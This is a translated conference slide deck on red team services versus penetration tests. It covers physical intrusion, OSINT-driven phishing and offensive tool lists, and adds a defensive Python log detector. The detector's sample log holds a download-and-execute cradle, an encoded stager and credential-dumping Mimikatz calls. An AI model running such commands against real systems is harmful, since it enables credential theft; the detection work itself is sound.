What is Red Team Service?
~Latest Penetration Test Trends in U.S.~
TOMOHISA ISHIKAWA
scientia.admin@gmail.com
www.scientia-security.org
WHO AM I?
▪ Tomohisa Ishikawa
• Security Consultant (9 years' experience)
• Specialized areas: penetration testing, IR, security consultation, vulnerability management, awareness, training, global security management…
• Speaker experience: SANSFIRE 2011 & 2012, DEF CON 24 SE Village, LASCON 2016, BSides Philly 2017
• Certification junkie: CISSP, CSSLP, CISA, CISM, CFE, GPEN, GWAPT, GXPN, GWEB, GSNA, GREM, GCIH
Objective
▪ Sharing one year of experience on the security team of a U.S. insurance company
▪ Understanding the difference in methodology
• Traditional “Penetration Test” vs. “Red Team”
Does your company (or organization) do penetration testing?
Penetration Test in Japan is …
▪ Looking at the home pages of companies L, N and M…
• Web security assessment service (web application testing)
• Platform assessment service (platform testing)
• Targeted-attack assessment service (phishing mail training, egress control verification)
• Wireless LAN assessment service
• DDoS readiness verification service
▪ Safety first!! The safety of the system is the first priority.
▪ Note: I use “security assessment” and “penetration test” with almost the same meaning; anyone who for religious reasons cannot tolerate the two being discussed together should substitute terms as they see fit.
When you go to the U.S.…
Surprisingly, few people call themselves penetration testers?
Only a few people said “I am a penetration tester”
Is “Penetration Test” tacky???
What is “Red Team”?
▪ Originally a concept born in the intelligence community
▪ A team that examines operations from the adversary's point of view and critically verifies the credibility of the intelligence obtained
• Devil's Advocate
• CIA Red Cell
What is the difference btw “Red Team” and “Pen Test”?
⇒ Coverage is different!!
Three domains: Digital, Physical, Social
• Web Application Testing
• Platform Testing
• APT Simulation
• APT Mail Awareness Training
• Vishing (Voice Phishing)
• OSINT
• Tailgating
• Impersonation
• ID Card Cloning
• Physical Access to Box
• Elevator Hacking
• Physical Control Bypass
What is the difference btw “Red Team” and “Pen Test”?
⇒ Different Features
▪ According to Gartner…
• Long-term challenge (NOT a point-in-time assessment)
• Testing runs over a longer period, and can take place at any time, 24 hours a day.
• Defense coordination
• The Blue Team's capabilities are evaluated as well, and the results feed into improvement.
• Adversary simulation
• Carried out from the perspective of the attacker itself (a fusion of the three perspectives).
• Controlled but real intrusion
Case 1: Physical Penetration Test
▪ Objective
• How far inside can we get, and what information can we obtain? Is it possible to bypass physical access control?
▪ Methodology
• Breaking locks (picking, impressioning, bypassing)
• Elevator hacking
• RFID cloning
• Social engineering
Case 2: APT Adversary Simulation Service
▪ The SLA of the APT Adversary Simulation Service (targeted attack service) is as follows:
• Awareness Phishing
• Penetration Test Phishing
• Red Team Phishing
Red Team Phishing
▪ Attempting the same kind of attack as the “Japan Pension Service” incident
• Following the Cyber Kill Chain
• OSINT & SOCMINT
• Selecting 2 to 3 targets and sending an email with an attachment
• Exploitation
• Using a “fresh” vulnerability and exploit
• Post-exploitation with PowerShell
• Password cracking with GPU
• Lateral movement and reaching the “treasures”
OSINT Example
▪ Check LinkedIn and identify the target
▪ Analyze Twitter with SOCMINT tools
• The target tends to buy shoes at an apparel shop
• A coupon is sent while impersonating that apparel shop
TOOLS
▪ OSINT
• Maltego https://www.paterva.com/web7/
• FOCA https://www.elevenpaths.com/labstools/foca/index.html
• SpiderFoot http://www.spiderfoot.net/
• Discovery Script https://github.com/leebaird/discover
• Recon-ng https://bitbucket.org/LaNMaSteR53/recon-ng
• Cymon https://cymon.io/
• WeLink https://welink.com/dashboard/
• GEOFEEDIA https://geofeedia.com/
• ECHOSEC https://www.echosec.net/
TOOLS
▪ Other tools (some of them are experimental)
• GoPhish https://getgophish.com/
• Social Engineering Toolkit in Kali Linux
• Cobalt Strike https://www.cobaltstrike.com/
• Mimikatz https://github.com/gentilkiwi/mimikatz
• Responder https://github.com/SpiderLabs/Responder
• IPMI http://fish2.com/ipmi/remote-pw-cracking.html
• MITM Framework https://github.com/byt3bl33d3r/MITMf
• Spray WMI https://github.com/trustedsec/spraywmi
TOOLS
▪ PowerShell tools
• PowerShell Empire https://github.com/EmpireProject/Empire
• EmPyre (Python) https://github.com/EmpireProject/EmPyre
• PowerSploit https://github.com/PowerShellMafia/PowerSploit
• Includes PowerView, Invoke-Mimikatz and PowerUp
• Veil Framework https://www.veil-framework.com/
• Nishang https://github.com/samratashok/nishang
• Invoke-Obfuscation https://github.com/danielbohannon/Invoke-Obfuscation
• PS Attack https://github.com/jaredhaight/psattack
• NaishoDeNusumu https://github.com/3nc0d3r/NaishoDeNusumu
• BloodHound https://github.com/BloodHoundAD/BloodHound
Resource
▪ Great presentations
• AD Security https://adsecurity.org/
• All of the presentations are awesome
• Adversarial Post-Exploitation: Lessons From The Pros
• https://www.youtube.com/watch?v=x3crG-hM9sc
• A Year in the Empire
• https://www.youtube.com/watch?v=ngvHshHCt_8
• PowerShell Secrets and Tactics
• https://www.youtube.com/watch?v=EQv4bJnCw8M
• Introducing PowerShell into your Arsenal with PS>Attack
• https://www.youtube.com/watch?v=mPckt6HQPsw
• Invoke-Obfuscation: PowerShell obFUsk8tion Techniques
• https://www.youtube.com/watch?v=P1lkflnWb0I
From Blue Team Side
▪ The following really matter!!
• Full Spectrum Visibility (complete visibility)
• Targeted Containment
▪ EDR (Endpoint Detection & Response)
• e.g. Tanium, Fidelis, Carbon Black, FireEye, CrowdStrike, Red Cloak, Cybereason…
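As an added example (not from the original slides), the script below shows one concrete piece of the “full spectrum visibility” this slide calls for: it scores PowerShell script-block log entries (Windows Event ID 4104, produced by Script Block Logging) for the PowerShell tradecraft named on the earlier tool slides, and keeps host and user on each alert for targeted containment. The log format, the log lines and the indicator list are constructed assumptions; 192.0.2.10 is a documentation address.

```python
"""Added example (not from the original slides): score PowerShell script-block log
entries (Windows Event ID 4104) for the tradecraft the deck lists: Invoke-Mimikatz /
PowerView calls, download cradles, -EncodedCommand and Invoke-Obfuscation-style
string tricks. The log format and all log lines are constructed for this demo."""
import base64
import re
from typing import Dict, List

# Function names from tools the preceding slides name (PowerSploit/PowerView/PowerUp).
KNOWN_TOOL_FUNCTIONS = re.compile(
    r"\b(Invoke-Mimikatz|Invoke-Kerberoast|Get-NetUser|Get-NetComputer|"
    r"Invoke-ShareFinder|Find-LocalAdminAccess|Invoke-AllChecks|Get-GPPPassword)\b", re.I)
DOWNLOAD_CRADLE = re.compile(
    r"\bIEX\b.*\b(?:DownloadString|DownloadFile)\b|\bInvoke-Expression\b.*\bWebClient\b", re.I | re.S)
ENCODED_COMMAND = re.compile(r"-(?:EncodedCommand|enc|ec|e)\s+([A-Za-z0-9+/=]{16,})", re.I)
CONCAT = re.compile(r"'([^']*)'\s*\+\s*'([^']*)'")
OBFUSCATION_PATTERNS = {  # matched on the raw text, before normalisation
    "string-concat-invoke": re.compile(r"&\s*\(\s*'[^']*'(?:\s*\+\s*'[^']*')+\s*\)"),
    "backtick-in-token": re.compile(r"[A-Za-z]`[A-Za-z]"),
    "char-cast": re.compile(r"\[char\]\s*\d+", re.I),
    "format-operator": re.compile(r"\"(?:\{\d+\}){2,}\"\s*-f\s", re.I),
    "hidden-window": re.compile(r"-(?:W|WindowStyle)\s+Hidden", re.I),
}
WEIGHTS = {"known-tool": 50, "download-cradle": 40, "encoded-command": 20, "obfuscation": 15}

def normalize(text: str) -> str:
    """Undo two cheap obfuscations before name matching: 'In'+'voke' concatenation and
    backticks inside identifiers (I`nvoke). Dropping every backtick is an approximation."""
    prev = None
    while prev != text:
        prev, text = text, CONCAT.sub(lambda m: f"'{m.group(1)}{m.group(2)}'", text)
    return text.replace("`", "")

def decode_encoded_command(blob: str) -> str:
    """-EncodedCommand carries base64 of UTF-16LE text; return '' if malformed."""
    try:
        return base64.b64decode(blob).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return ""

def analyze_script_block(text: str, depth: int = 0) -> Dict[str, object]:
    """Indicators and score for one script block. An encoded payload is decoded and
    scanned recursively (bounded, because stagers nest -EncodedCommand layers)."""
    plain = normalize(text)
    hits = [f"known-tool:{m.group(1)}" for m in KNOWN_TOOL_FUNCTIONS.finditer(plain)]
    if DOWNLOAD_CRADLE.search(plain):
        hits.append("download-cradle")
    hits += [f"obfuscation:{n}" for n, p in OBFUSCATION_PATTERNS.items() if p.search(text)]
    enc = ENCODED_COMMAND.search(text)
    if enc and depth < 3:
        hits.append("encoded-command")
        hits += analyze_script_block(decode_encoded_command(enc.group(1)), depth + 1)["hits"]
    hits = list(dict.fromkeys(hits))  # de-duplicate, keep order
    return {"hits": hits, "score": sum(WEIGHTS[h.split(":", 1)[0]] for h in hits)}

def parse_log(log: str) -> List[Dict[str, str]]:
    """Constructed format: time|host|user|script (the script itself may contain '|')."""
    rows = []
    for line in log.strip().splitlines():
        time, host, user, script = line.split("|", 3)
        rows.append({"time": time, "host": host, "user": user, "script": script})
    return rows

def triage(log: str, threshold: int = 40) -> List[Dict[str, object]]:
    """Rows at or above threshold, keeping host and user so the Blue Team can contain
    the one endpoint and account involved (targeted containment) rather than everything."""
    alerts = []
    for row in parse_log(log):
        result = analyze_script_block(row["script"])
        if result["score"] >= threshold:
            alerts.append({**row, **result})
    return alerts

# Constructed sample log; 192.0.2.10 is a documentation address (RFC 5737).
_STAGER = "IEX (New-Object Net.WebClient).DownloadString('http://192.0.2.10/a')"
_ENCODED = base64.b64encode(_STAGER.encode("utf-16-le")).decode("ascii")
SAMPLE_LOG = "\n".join([
    "2017-11-01T09:12:03|WS-0417|CORP\\jdoe|Get-ChildItem C:\\Users\\jdoe\\Documents -Recurse | Measure-Object",
    "2017-11-01T09:13:44|WS-0417|CORP\\jdoe|IEX (New-Object Net.WebClient).DownloadString("
    "'http://192.0.2.10/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds",
    f"2017-11-01T09:14:10|WS-0417|CORP\\jdoe|powershell -NoP -W Hidden -EncodedCommand {_ENCODED}",
    "2017-11-01T09:15:02|WS-0417|CORP\\jdoe|&('In'+'voke'+'-Mim'+'ikatz') -DumpCreds",
    "2017-11-01T09:16:30|SRV-AD01|CORP\\svc_backup|Get-NetUser -Domain corp.local | Select-Object samaccountname",
])
```

Running `triage(SAMPLE_LOG)` flags four of the five constructed entries; the benign Get-ChildItem line scores 0, and the concatenated `&('In'+'voke'+'-Mim'+'ikatz')` line is still attributed to Invoke-Mimikatz because normalize() rebuilds the name before matching.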
Wrap-Up
▪ “Red team” is the U.S. trend
▪ Focus on comprehensive testing
Thank You!!
▪ If you have any questions, please feel free to contact me
Contact Info
• Email scientia.admin@gmail.com
• JP Blog www.scientia-security.org
Bonus Session
Digital Penetration Test Certification
▪ Certifications for penetration testers
• CEH (by EC-Council)
• GIAC (by SANS)
• OSCP (by Offensive Security)

[AVTOKYO 2017] What is red team?
